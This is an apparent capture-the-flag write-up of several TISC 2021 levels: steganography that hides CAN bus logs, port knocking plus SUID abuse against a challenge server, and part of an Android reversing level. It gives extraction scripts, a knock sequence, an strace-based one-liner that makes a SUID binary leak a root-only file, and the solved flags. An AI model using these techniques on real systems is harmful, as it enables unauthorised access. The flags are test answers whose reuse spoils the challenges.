We have intercepted some instructions sent to an autonomous bomb truck used by PALINDROME. However, it seems to be just a BMP file of a route to the Istana!

Analyze the file provided and uncover PALINDROME's instructions. Find a way to kill the operation before it is too late.

Ensure the md5 checksum of the given file matches the following before starting: 26dc6d1a8659594cdd6e504327c55799

Submit your flag in the format: TISC{flag found}.

Note: The flag found in this challenge is not in the TISC{...} format. To assist in verifying if you have obtained the flag, the md5 checksum of the flag is: d6808584f9f72d12096a9ca865924799.

ATTACHED FILES

route.bmp

This steganography challenge stumped many participants. On the surface, route.bmp looked like a simple screenshot of a map.

route.bmp

Using stegsolve, I noticed interesting outputs when I applied the plane 0 filter on either red, green, or blue values.

Stegsolve

The top half of the image resembled static instead of the expected black and white outline of the original image. While researching more image steganography techniques, I came across another CTF writeup which featured a similar “static” generated by stegsolve. The writeup described how the image hid the data in the least significant bits of each pixel's RGB values. I applied the script from the writeup to extract the data but encountered a slight corruption. Although the first few bytes 37 7A C2 BC C2 AF 27 1C almost matched the magic bytes of a 7-Zip file 37 7A BC AF 27 1C, the extra C2 bytes got in the way of a proper decoding.
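Stray C2 bytes in front of values above 0x7F are the typical footprint of binary data being written out as UTF-8 text. The sketch below only demonstrates that effect on the 7-Zip magic bytes; whether this was the actual source of the corruption in the borrowed script is an assumption.

```python
SEVEN_ZIP_MAGIC = bytes.fromhex("377abcaf271c")

# Treat each byte as a character, as a script building a str with chr() would
as_text = "".join(chr(b) for b in SEVEN_ZIP_MAGIC)

# UTF-8 encodes code points 0x80-0xBF as two bytes, the first being 0xC2
utf8_bytes = as_text.encode("utf-8")

# Latin-1 maps each code point below 0x100 back to a single byte
latin1_bytes = as_text.encode("latin-1")

print(utf8_bytes.hex(" "))
print(latin1_bytes.hex(" "))
```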

I decided to compare the expected binary output against the real output of the script.

Expected: 00110111 01111010 10111100 10101111 00100111 00011100     # 37 7A BC AF 27 1C
Real:     00110111001111011010001011100010000111101011010011100     # 37 3d a2 e2 1e b4 1c

After reading the writeup closely, I realised that the script correctly skipped every 9th bit but converted the bits to bytes too early. I fixed this bug to get a working decoder.

#!/usr/bin/env python
from PIL import Image
import sys

# Trim every 9th bit
def trim_bit_9(b):
    trimmed = ''
    while len(b) != 0:
        trimmed += b[:8]
        b = b[9:]
    return trimmed

# Load image data
img = Image.open(sys.argv[1])
w,h = img.size
pixels = img.load()

binary = ''
for y in range(h):
    for x in range(w):
        # Pull out the LSBs of this pixel in RGB order
        binary += ''.join([str(n & 1) for n in pixels[x, y]])

trimmed = trim_bit_9(binary)
with open('out.7z', 'wb') as file:
    file.write(bytes(int(trimmed[i : i + 8], 2) for i in range(0, len(trimmed), 8)))

The extracted 7-Zip file contained two files: update.log and candump.log.

updated.log contained the following text:

see turn signals for updated abort code :)
- P4lindr0me

Meanwhile, candump.log was a huge file that contained lines like this:

(1623740188.969099) vcan0 136#000200000000002A
(1623740188.969107) vcan0 13A#0000000000000028
(1623740188.969109) vcan0 13F#000000050000002E
(1623740188.969112) vcan0 17C#0000000010000021
(1623740225.790964) vcan0 324#7465000000000E1A
(1623740225.790966) vcan0 37C#FD00FD00097F001A
(1623740225.790968) vcan0 039#0039
(1623740225.792217) vcan0 183#0000000C0000102D
(1623740225.792231) vcan0 143#6B6B00E0
(1623740225.794607) vcan0 095#800007F400000017

What was I looking at? After a bit of Googling, I found out that candump was a tool to dump Controller Area Network (CAN) bus traffic. CAN itself was a network protocol used by vehicles. By searching for some of the lines in candump.log, I discovered a sample CAN log generated by ICSim. After doing some more research on the CAN protocol, I deduced that each line in the CAN dump matched the format (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>.
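That line format can be captured with a regular expression instead of fixed string offsets. A minimal sketch; parse_candump_line is a hypothetical helper name.

```python
import re

# (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>
CANDUMP_LINE = re.compile(
    r"\((?P<timestamp>\d+\.\d+)\)\s+(?P<interface>\S+)\s+"
    r"(?P<can_id>[0-9A-Fa-f]+)#(?P<data>[0-9A-Fa-f]*)"
)


def parse_candump_line(line):
    """Split one candump log line into (timestamp, interface, CAN ID, data bytes)."""
    match = CANDUMP_LINE.match(line.strip())
    if match is None:
        return None
    return (
        float(match["timestamp"]),
        match["interface"],
        match["can_id"].upper(),
        bytes.fromhex(match["data"]),
    )
```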

Based on the “see turn signals” clue, I needed to find the CAN instruction ID that matched the “turn signal” instruction. The CAN instruction data for turn signals probably contained the flag. I reviewed the source code of ICSim and saw that ICSim set the turn signal ID to either a default constant or some randomised value:

#define DEFAULT_SIGNAL_ID 392 // 0x188
...
  signal_id = DEFAULT_SIGNAL_ID;
  speed_id = DEFAULT_SPEED_ID;

  if (randomize || seed) {
	if(randomize) seed = time(NULL);
	srand(seed);
	door_id = (rand() % 2046) + 1;
	signal_id = (rand() % 2046) + 1;

Sadly, since none of the CAN dump lines contained the 188 instruction ID, I knew that the turn signal instruction ID had been randomised.

Based on the code and an ICSim tutorial, I also knew that the data values for the turn signal instruction could be 00 (both off), 01 (left on only), 02 (right on only), or 03 (both on). As such, I attempted to filter out all CAN instruction IDs that had at most 4 unique data values in candump.log. The instruction ID 40C looked promising because it only had the following unique data values: 40C: ['0000000004000013', '014A484D46413325', '0236323239533039', '033133383439000D']. However, despite spending hours hex-decoding the values, XORing them, and so on, I failed to retrieve any usable data.

After wasting a lot of time on this rabbit hole, I re-read the source code for sending a turn signal on ICSim.

void send_turn_signal() {
	memset(&cf, 0, sizeof(cf));
	cf.can_id = signal_id;
	cf.len = signal_len;
	cf.data[signal_pos] = signal_state;
	if(signal_pos) randomize_pkt(0, signal_pos);
	if(signal_len != signal_pos + 1) randomize_pkt(signal_pos+1, signal_len);
	send_pkt(CAN_MTU);
}

I noticed my mistake: the send_turn_signal function set only one byte in the CAN message data to the signal state byte, then randomised the rest of the data bytes. This meant that the turn signals would have far more than four possible unique data values! Instead, I should have filtered the CAN dump for turn signal IDs whose data values always included one of 00, 01, 02, or 03 in a fixed position. I quickly wrote a new script to do this.

can_combinations = dict()
can_count = dict()

with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id not in can_combinations:
            can_combinations[can_id] = [can_data]
        else:
            if can_data not in can_combinations[can_id]:
                can_combinations[can_id].append(can_data)
        if can_id not in can_count:
            can_count[can_id] = 1
        else:
            can_count[can_id] += 1

for can_id in can_combinations:
    if all(('01' in data or '02' in data or '03' in data or '00' in data) for data in can_combinations[can_id]):
        print("{} {}: {}".format(can_id, can_count[can_id], can_combinations[can_id]))
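The script above matches 00 to 03 anywhere in the hex string, which is looser than the fixed-position idea. A stricter variant could look like the sketch below, which reports, per CAN ID, the byte positions that only ever hold a signal state. The function name is hypothetical and this is not the script used in the original solution.

```python
from collections import defaultdict

SIGNAL_STATES = {"00", "01", "02", "03"}


def fixed_position_candidates(lines):
    """Map each CAN ID to the byte positions that always hold 00, 01, 02, or 03."""
    payloads = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        frame = line.split()[-1]            # e.g. "0C7#00006c88000000"
        can_id, _, data = frame.partition("#")
        payloads[can_id].add(data)

    candidates = {}
    for can_id, seen in payloads.items():
        lengths = {len(d) for d in seen}
        if len(lengths) != 1:
            continue                        # skip IDs with varying data lengths
        length = lengths.pop()
        positions = [
            pos // 2
            for pos in range(0, length, 2)
            if all(d[pos:pos + 2] in SIGNAL_STATES for d in seen)
        ]
        if positions:
            candidates[can_id] = positions
    return candidates
```

With only a handful of messages per ID several positions can qualify by chance, so the result is a shortlist rather than a definitive answer.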

Out of the possible filtered CAN IDs, 0C7 also looked promising because some of the data values contained ASCII characters when hex-decoded.

0C7: ['00006c88000000', '0E003100000011', '00006664000000', '00003369000066', '00E75f00D30000', '3A0931E20000E0', '07003500000000', '00005fA1000038', '00007782600000', '3521683F00016C', '00003400000005', '00003700000100', '4F005f00000000', '00006802000100', '00003483000000', 'B900702D000100', '00007006000000', '00B63300000117', 'F8786e000C00D6', '0092359B000100', '90005f77F80000', 'B3457700000100', '00006800000030', 'C9F13300AA0100', '00B56e00000000', '00005f98AB0186', '770079003800D0', '0000305D000100', 'F3427500000064', '00002700000100', 'A0007200460032', '00003312000100', 'C2005f000000E2', '00006200790100', '00007500000000', '00003500000000', '004A7900000000', '00005f00000000', '00006d33000000', '000034000000BF', '00136b0000005C', '00F63100000000', '00006e00AA0099', '15003600000000', '7B005fD6000000', 'BC003020000000', 'B7003700000000', '0000680000006C', '00003300310000', '50007200A50000', '00005f00A60000', '00E67000A200A2', '77006c00450059', '89003400000000', '59006e2AE500D1', '00E23500F80000', '00912eC2B40000', '00002d00000100', '003E6a007B0060', '00005f00F70132', '0000304F000000', '00FB5f00000100', '44576800000000', '00005f00000193', 'FD006eDE450000', '00895f00900100', '00006c00910000', '00005fDDD10000', '00003300000200', '00CA5f00CC0000', 'E4FB6e00000000', '00005f00770000', '00006e00000000', '00005f00810000', '00003049940000', '00F95f003600D4', '6E7B6e936C0051']

After a lot of manual copying and pasting, I found that these ASCII characters appeared in the third byte of each instruction's data. Based on this hunch, I wrote another short script to extract and decode these bytes.

can_combinations = dict()
can_count = dict()

encoded = ''
with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id == '0C7':
            encoded += can_data[4:6]

print(bytes.fromhex(encoded).decode('utf-8'))

This produced l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n which matched the checksum d6808584f9f72d12096a9ca865924799.

TISC{l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n}

Level 6: Knock Knock, Who's There

Domains: Network Forensics, Reverse Engineering

Traffic capture suggests that a server used to store OTP passwords for PALINDROME has been found. Decipher the packets and figure out a way to get in. Move quick, time is of essence.

https://transfer.ttyusb.dev/s4is2/traffic_capture.pcapng

Server at 128.199.211.243

Note: The challenge instance may be reset periodically so do save a copy of any files you might need on your machine.

I was halfway there, but I faced the most mind-bending level yet. I downloaded the massive 614 MB PCAP file containing all kinds of traffic, including SSH, SMB, HTTP, and more. Based on the title of the level and “time is of essence” in the description, I suspected that the challenge involved port knocking. I needed to discover the port knocking sequence needle in the haystack and thereafter use it to access the server at 128.199.211.243. I ran a full nmap scan of the server which returned zero open ports, another strong hint that port knocking was the solution.

To start off, I scanned the PCAP with VirusTotal and Suricata, both of which flagged malicious traffic.

08/26/2021-19:47:30.560000  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000  [**] [1:2008715:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445

At first, I thought I had to extract the binaries sent by the malicious traffic and reverse engineer them, similar to last year's Flare-On Challenge 7. This sent me down a deep, dark rabbit hole in which I attempted to reverse engineer Meterpreter traffic and other payloads. After wasting many hours on reverse engineering, I went back to the port knocking idea. One CTF blog post suggested that I could use the Wireshark filter (tcp.flags.reset eq 1) && (tcp.flags.ack eq 1) to retrieve port knocking sequences. However, this approach failed because in the author's case, the knocked ports responded with a RST, ACK packet whereas for this challenge the knocked ports were completely filtered.

Growing desperate, I noticed that some of the HTTP traffic contained references to the U.S. National CyberWatch Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) 2012. For example, Network Miner extracted a file named attackerHome.php that included this HTML code:

	<select id='eventSelect' name='eventId'>
		<option value=''>Select an Event...</option>
		<option value='1' >Mid-Atlantic CCDC 2011</option>
		<option value='21' >Cyberlympics - Miami</option>
		<option value='30' >Mid-Atlantic CCDC 2012</option>
 	</select>

Following this lead, I found out that traffic captures for MACCDC 2012 were available online as PCAP files. However, for 2012 alone, the organisers released 16 different PCAP files, each several hundred MBs in size.

With no better ideas, I downloaded every single MACCDC 2012 PCAP file and manually checked each one for matching packets in traffic_capture.pcapng. After several painfully large downloads, I narrowed it down to maccdc2012_00013.pcap.

Next, I used a PCAP diffing script to extract unique packets in traffic_capture.pcapng that did not appear in maccdc2012_00013.pcap. Parsing the two massive files took about half an hour but I got my answer: traffic_capture.pcapng included extra HTTP traffic between 192.168.242.111 and 192.168.24.253.

GET /debug.txt HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.57.130:21212
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 24 Aug 2021 07:48:38 GMT
Content-type: text/plain
Content-Length: 138
Last-Modified: Tue, 24 Aug 2021 07:43:39 GMT

DEBUG PURPOSES ONLY. CLOSE AFTER USE.
++++++++
5 ports.
++++++++
Account.
++++++++
SSH.
++++++++
End debug. Check and re-enable firewall.

Two things stood out to me. Firstly, the HTTP response suggested that there were 5 ports in the port knocking sequence to open the SSH port. Secondly, the host header 192.168.57.130:21212 did not match the HTTP server IP 192.168.24.253. Perhaps this was a hint about the ports?

I attempted multiple permutations of 192, 168, 57, 130, and 21212 using a port knocking script to no avail. After several more hours sunk into this rabbit hole, I resorted to writing my own diffing script because I realised that the previous PCAP diffing script missed out some packets.

from scapy.all import PcapReader, wrpcap, Packet, NoPayload, TCP


i = 0
with PcapReader('macccdc253.pcap') as maccdc_packets, PcapReader('traffic253.pcap') as traffic_packets:
    for maccdc_packet in maccdc_packets:
        candidate_traffic_packet = traffic_packets.read_packet()
        while maccdc_packet[TCP].payload != candidate_traffic_packet[TCP].payload:
            print("NOMATCH {}".format(i))
            candidate_traffic_packet = traffic_packets.read_packet()
            if TCP not in candidate_traffic_packet:
                print("NOMATCH {}".format(i))
                candidate_traffic_packet = traffic_packets.read_packet()
            i += 1
        i += 1

This new script revealed that there were indeed more unique packets. These turned out to be a series of TCP SYN packets from 192.168.202.95 to 192.168.24.253 followed by an SSH connection!
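As a rough illustration of the diffing idea, the sketch below treats each capture as a sequence of raw TCP payloads and reports the payloads in one capture that have no counterpart in the baseline. The function name unique_payloads and the list-of-bytes inputs are assumptions made for this example; with real PCAP files, the payloads would first have to be pulled out of each packet (for instance with scapy's PcapReader, as in the script above).

```python
from collections import Counter


def unique_payloads(capture, baseline):
    """Return payloads from `capture` that are not accounted for in `baseline`.

    Both arguments are iterables of bytes objects (hypothetical, pre-extracted
    TCP payloads). A multiset is used so that a payload appearing three times
    in `capture` but only twice in `baseline` is still reported once.
    """
    remaining = Counter(baseline)
    extras = []
    for payload in capture:
        if remaining[payload] > 0:
            # This payload is matched by one occurrence in the baseline.
            remaining[payload] -= 1
        else:
            # No unmatched baseline occurrence left, so it is unique.
            extras.append(payload)
    return extras
```

Unlike a strictly sequential comparison, this approach does not care about packet order, at the cost of holding the baseline's payload counts in memory.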

Port Knocking Packets

Even better, the [PSH, ACK] packet sent from the server after the port knocking sequence contained SSH credentials.

SSH Credentials

This was my ticket. I repeated the port knocking sequence with python .\knock.py <IP ADDRESS> 2928 12852 48293 9930 8283 42069 and I received the packet containing the SSH credentials. The credentials only lasted for a few seconds and changed on each iteration; I probably should have automated the SSH login but manually copying and pasting worked as well.
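The knock.py script itself is not shown here, so the following is only a minimal sketch of what a port knocking client could look like, assuming plain TCP connection attempts are enough to register as knocks. The function name knock and the timeout and delay parameters are hypothetical.

```python
import socket
import time


def knock(host, ports, timeout=0.5, delay=0.1):
    """Send one TCP connection attempt (a SYN) to each port, in order.

    The knocked ports are expected to be filtered or closed, so connection
    failures and timeouts are ignored. Returns the list of ports attempted.
    """
    attempted = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            try:
                sock.connect((host, port))
            except OSError:
                # Refused, filtered, or timed out: the SYN was still sent.
                pass
        attempted.append(port)
        time.sleep(delay)
    return attempted


# Example call with the sequence recovered from the capture:
# knock("<IP ADDRESS>", [2928, 12852, 48293, 9930, 8283, 42069])
```

Keeping the timeout short matters because each filtered port would otherwise block until the operating system gives up on the connection.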

I logged in as the low-privileged challenjour user. The home folder contained an otpkey executable and secret.txt. secret.txt could only be read by root, but otpkey had the SUID bit set so it could read secret.txt.

I pulled otpkey from the server and decompiled it in IDA. I annotated the pseudocode accordingly:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int i; // eax
  const char *encrypted_machine_id_hex; // rax
  int can_open_dest_file; // [rsp+18h] [rbp-78h]
  char *dest_file; // [rsp+20h] [rbp-70h]
  char *source_file_bytes; // [rsp+28h] [rbp-68h]
  char *dest_file_bytes; // [rsp+30h] [rbp-60h]
  char *tmp_otk_file; // [rsp+38h] [rbp-58h]
  const char *source_file; // [rsp+40h] [rbp-50h]
  _BYTE *encrypted_machine_id; // [rsp+48h] [rbp-48h]
  char tmp_otk_dir[16]; // [rsp+50h] [rbp-40h] BYREF
  __int64 v14; // [rsp+60h] [rbp-30h]
  __int64 v15; // [rsp+68h] [rbp-28h]
  __int64 v16; // [rsp+70h] [rbp-20h]
  __int16 v17; // [rsp+78h] [rbp-18h]
  unsigned __int64 v18; // [rsp+88h] [rbp-8h]

  v18 = __readfsqword(0x28u);
  can_open_dest_file = 0;
  dest_file = 0LL;
  source_file_bytes = 0LL;
  dest_file_bytes = 0LL;
  tmp_otk_file = 0LL;
  strcpy(tmp_otk_dir, "/tmp/otk/");
  v14 = 0LL;
  v15 = 0LL;
  v16 = 0LL;
  v17 = 0;
  for ( i = getopt(a1, a2, "hm"); ; i = getopt(a1, a2, "hm") )
  {
    if ( i == -1 )
    {
      if ( a1 == 4 )
        return 0LL;
    }
    else
    {
      if ( i != 109 )                           // 'm' so opt is h instead
      {
        printf("Usage: %s [OPTIONS]\n", *a2);
        puts("Print some text :)n");
        puts("Options");
        puts("=======");
        puts("[-m] curr_location new_location \tMove a file from curr location to new location\n");
        exit(0);
      }
      if ( a1 != 4 )
      {
        puts("[-m] curr_location new_location \tMove file from curr location to new location");
        exit(0);
      }
      source_file = a2[2];
      dest_file = a2[3];
      printf("Requested to move %s to %s.\n", source_file, dest_file);
      if ( (unsigned int)is_alpha(source_file) && (unsigned int)is_alpha(dest_file) )
      {
        if ( (unsigned int)check_needle(source_file) )// check if source file has 'secret.t'
          can_open_dest_file = can_open(dest_file);
        if ( can_open_dest_file )
        {
          source_file_bytes = (char *)read_bytes(source_file);
          dest_file_bytes = (char *)read_bytes(dest_file);
          if ( source_file_bytes && dest_file_bytes )
            write_bytes_to_file(dest_file, source_file_bytes);
        }
        else
        {
          source_file_bytes = (char *)read_bytes(source_file);
          if ( source_file_bytes )
          {
            write_bytes_to_file(dest_file, source_file_bytes);
            chmod(dest_file, 0x180u);
          }
        }
      }
    }
    encrypted_machine_id = encrypt_machine_id();
    if ( encrypted_machine_id )
    {
      encrypted_machine_id_hex = (const char *)bytes_to_hex(encrypted_machine_id);
      strncat(tmp_otk_dir, encrypted_machine_id_hex, 0x20uLL);// appends encrypted machine id to /tmp/otk/
      tmp_otk_file = (char *)read_bytes(tmp_otk_dir);
      if ( tmp_otk_file )
        printf("%s", tmp_otk_file);
    }
    else
    {
      puts("An error occurred.");
    }
    free_wrapper(encrypted_machine_id);
    free_wrapper(tmp_otk_file);
    if ( !can_open_dest_file )
      break;
    write_bytes_to_file(dest_file, dest_file_bytes);// restores dest file...
    free_wrapper(source_file_bytes);
    free_wrapper(dest_file_bytes);
    dest_file = 0LL;
  }
  return 0LL;
}

otpkey moved a file from arg1 to arg2. If arg1 was secret.txt, the program wrote the contents of secret.txt to the destination file, but before exiting it would also restore the destination file's original contents, preventing me from reading the flag. The section starting from encrypted_machine_id = encrypt_machine_id(); looked more interesting. It attempted to read /tmp/otk/<encrypt_machine_id()> and print the contents of the file. Since this occurred before it restored the destination file, I could theoretically write secret.txt to the OTK file and print its contents to get the flag!

What string did encrypt_machine_id generate?

_BYTE *encrypt_machine_id()
{
  size_t v0; // rax
  size_t ciphertext_len; // rax
  int i; // [rsp+0h] [rbp-80h]
  void *machine_id; // [rsp+8h] [rbp-78h]
  time_t current_time_reduced; // [rsp+10h] [rbp-70h]
  char *_etc_machine_id; // [rsp+18h] [rbp-68h]
  _BYTE *machine_id_unhexed; // [rsp+20h] [rbp-60h]
  _BYTE *encrypted_machine_id; // [rsp+28h] [rbp-58h]
  char *ciphertext; // [rsp+38h] [rbp-48h]
  char plaintext[8]; // [rsp+46h] [rbp-3Ah] BYREF
  __int16 v11; // [rsp+4Eh] [rbp-32h]
  __int64 v12[2]; // [rsp+50h] [rbp-30h] BYREF
  __int64 md5_hash[4]; // [rsp+60h] [rbp-20h] BYREF

  md5_hash[3] = __readfsqword(0x28u);
  *(_QWORD *)plaintext = 0LL;
  v11 = 0;
  v12[0] = 0x13111D5F1304155FLL;
  v12[1] = 0x14195D151E1918LL;
  encrypted_machine_id = calloc(0x10uLL, 1uLL);
  md5_hash[0] = 0LL;
  md5_hash[1] = 0LL;
  current_time_reduced = time(0LL) / 10;
  snprintf(plaintext, 0xAuLL, "%ld", current_time_reduced);
  v0 = strlen(plaintext);
  ciphertext = (char *)calloc(4 * v0, 1uLL);
  RC4("O).2@g", plaintext, ciphertext);
  strlen(plaintext);
  ciphertext_len = strlen(ciphertext);
  MD5(ciphertext, ciphertext_len, md5_hash);
  free_wrapper(ciphertext);
  _etc_machine_id = xor_0x70((const char *)v12);// xor_0x70
  machine_id = read_bytes(_etc_machine_id);     // fb60706a312b4ddab835445d28153227
  free_wrapper(_etc_machine_id);
  if ( !machine_id )
    return 0LL;
  machine_id_unhexed = (_BYTE *)read_hex_string(machine_id);
  if ( !machine_id_unhexed || !encrypted_machine_id )
    return 0LL;
  for ( i = 0; i <= 15; ++i )
    encrypted_machine_id[i] = machine_id_unhexed[i] ^ *((_BYTE *)md5_hash + i);// xor with each byte of weak md5_hash
  free_wrapper(machine_id_unhexed);
  return encrypted_machine_id;
}

By following the pseudocode, I deduced that the function generated the one-time key using XOR(MD5(RC4(str(time(0LL) / 10), "O).2@g")), machine-id). Since it divided time(0) by 10, each one-time key lasted for ten seconds.
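The derivation can be sketched in Python as below. This is only a reading of the pseudocode, not a verified reimplementation: it assumes a textbook RC4, models the strlen call by cutting the ciphertext at the first NUL byte, and models the 10-byte snprintf buffer by keeping at most nine digits. The names rc4 and one_time_key and the now parameter are hypothetical, and the output may well differ from what the binary produces.

```python
import hashlib
import time
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling followed by keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def one_time_key(machine_id_hex: str, now: Optional[float] = None) -> str:
    """Approximate XOR(MD5(RC4(str(time / 10), key)), machine-id) as hex."""
    window = int(time.time() if now is None else now) // 10
    plaintext = str(window)[:9].encode()          # snprintf(..., 0xA, "%ld")
    ciphertext = rc4(b"O).2@g", plaintext)
    ciphertext = ciphertext.split(b"\x00", 1)[0]  # strlen() stops at NUL
    digest = hashlib.md5(ciphertext).digest()
    machine_id = bytes.fromhex(machine_id_hex)
    return bytes(a ^ b for a, b in zip(machine_id, digest)).hex()


# Machine ID taken from the annotation in the decompiled function.
print(one_time_key("fb60706a312b4ddab835445d28153227"))
```

Any call made within the same ten-second window yields the same value, which is the property that makes the key short-lived.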

At first, I tried generating the one-time key myself but the output did not match anything in /tmp/otk. After several more failed attempts, I realised that I could simply use strace to trace otpkey's system calls. When otpkey attempted to open /tmp/otk/<encrypt_machine_id()>, strace logged the system call along with its file path argument.

Since the server had already installed strace, I crafted a Bash one-liner to do this: dest=$(strace ./otpkey -m secret.txt /tmp/ptl 2>&1 | grep /tmp/otk | cut -c 19-59);./otpkey -m secret.txt $dest. With that, I solved the challenge.

TISC{v3RY|53CrE+f|@G}

Level 7: The Secret

Domains: Steganography, Android Security, Cryptography

Our investigators have recovered this email sent out by an exposed PALINDROME hacker, alias: Natasha. It looks like some form of covert communication between her and PALINDROME.

Decipher the communications channel between them quickly to uncover the hidden message, before it is too late.

Submit your flag in the format: TISC{flag found}.

Bye for now.eml

Bye for now.eml contained the following text:


GIB,



I=E2=80=99ll be away for a while. Don=E2=80=99t miss me. You have my pictur=
e :D

Hope the distance between us could help me see life from a different
perspective. Sometimes, you will find the most valuable things hidden in
the least significant places.





Natasha

My hex editor revealed a large base64 string appended as an HTML comment. Decoding the string produced a PNG image file of Natasha Romanoff from the Avengers. Based on the “least significant places” hint from the email message, I suspected that the image embedded data using least significant bit steganography. I confirmed this with stegsolve as the plane 0 filters displayed the tell-tale “static” at the top of the image.

Stegsolve Output

I used the stegonline tool to retrieve the bytes, which formed the string https://transfer.ttyusb.dev/8S8P76hlG6yEig2ywKOiC6QMak4iGaKc/data.zip.
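To show the principle behind the extraction, here is a minimal sketch of least significant bit steganography on a flat list of channel values. It assumes one hidden bit per value, packed most significant bit first; the actual channel order and bit order used in the image are not stated above, and the helper names embed_lsb and extract_lsb are made up for this example.

```python
def embed_lsb(values, message):
    """Hide `message` (bytes) in the lowest bit of each value in `values`."""
    bits = [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]
    if len(bits) > len(values):
        raise ValueError("not enough carrier values for this message")
    stego = list(values)
    for index, bit in enumerate(bits):
        # Clear the lowest bit, then set it to the message bit.
        stego[index] = (stego[index] & ~1) | bit
    return stego


def extract_lsb(values, n_bytes):
    """Rebuild `n_bytes` bytes from the lowest bit of consecutive values."""
    out = bytearray()
    for i in range(n_bytes):
        byte = 0
        for value in values[i * 8:(i + 1) * 8]:
            byte = (byte << 1) | (value & 1)
        out.append(byte)
    return bytes(out)


carrier = [200] * 64                      # stand-in for pixel channel values
hidden = embed_lsb(carrier, b"https://")
print(extract_lsb(hidden, 8))
```

Because only the lowest bit of each value changes, the image looks unmodified to the eye, while the bit plane 0 view shows the noisy band where data was written.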

The link downloaded a password-protected ZIP file containing an app.apk file. The ZIP file included an extra comment at the bottom: LOBOBMEM MULEBES ULUD RIKIF GNIKCARC EROFEB NIAGA KNIHT. I reversed the string and got THINK AGAIN BEFORE CRACKING FIKIR DULU SEBELUM MEMBOBOL.

Despite such fine advice, I responded in a predictable manner:

I Can't Read

After wasting several hours trying to guess and crack the password, I came across a useful CTF guide that revealed that ZIPs could be pseudo-encrypted by setting the encryption flag without actually encrypting the data. I modified the corresponding byte in my hex editor and lo and behold, I opened the ZIP without a password!
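The same fix can be scripted instead of done by hand. The sketch below walks the ZIP central directory and flips bit 0 of the general purpose bit flag in every central directory entry and its matching local file header. It assumes a simple, single-disk, non-ZIP64 archive, and the function name set_encryption_flags is hypothetical.

```python
import struct


def set_encryption_flags(data: bytes, encrypted: bool = False) -> bytes:
    """Set or clear the 'encrypted' flag bit for every entry in a ZIP archive.

    Only the flag bit is touched; the file data itself is left unchanged,
    which is exactly what makes pseudo-encryption reversible.
    """
    buf = bytearray(data)
    eocd = buf.rfind(b"PK\x05\x06")               # end of central directory
    if eocd < 0:
        raise ValueError("end of central directory record not found")
    (total_entries,) = struct.unpack_from("<H", buf, eocd + 10)
    (pos,) = struct.unpack_from("<I", buf, eocd + 16)
    for _ in range(total_entries):
        if buf[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("malformed central directory entry")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        (local_offset,) = struct.unpack_from("<I", buf, pos + 42)
        # Flags are little-endian: bit 0 lives in the first flag byte.
        for flag_offset in (pos + 8, local_offset + 6):
            if encrypted:
                buf[flag_offset] |= 0x01
            else:
                buf[flag_offset] &= 0xFE
        pos += 46 + name_len + extra_len + comment_len
    return bytes(buf)
```

Calling set_encryption_flags(zip_bytes) on a pseudo-encrypted archive should make it readable without a password, whereas a genuinely encrypted archive would simply yield garbage or checksum errors.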

I installed the APK on my test Android phone and opened it.

The Secret App

Clicking “I'M IN POSITION” caused the application to close because the time, latitude, longitude, and data were invalid.

I decompiled the APK with jadx and noticed that the MainActivity function initialised the Myth class, which then executed System.loadLibrary("native-lib"). This corresponded with libnative-lib.so in the APK's lib folder, so I decompiled it in IDA. The library exported two interesting functions: Java_mobi_thesecret_Myth_getTruth and Java_mobi_thesecret_Myth_getNextPlace.

Java_mobi_thesecret_Myth_getTruth performed a large number of _mm_shuffle_epi32 decryption routines before returning some plaintext which I suspected was the flag. It also verified that the second argument matched GIB's phone:

v7 = (const char *)(*(int (__cdecl **)(int *, int, char *))(*a4 + 676))(a4, a7, &v74);
v8 = strcmp(v7, "GIB's phone") == 0;

Meanwhile, Java_mobi_thesecret_Myth_getNextPlace checked latitude and longitude values:

if ( *(double *)&a5 > 103.7899 || *(double *)&a4 < 1.285 || *(double *)&a4 > 1.299 || *(double *)&a5 < 103.78 )
{
v10 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Not near. Try again.");
}

It also compared the second argument to a matching time value:

    if ( v7 == 22 && v8 > 30 || v7 == 23 && v8 < 15 )
    {
      std::string::append((int)v20, (int)&all, 71, 1u);
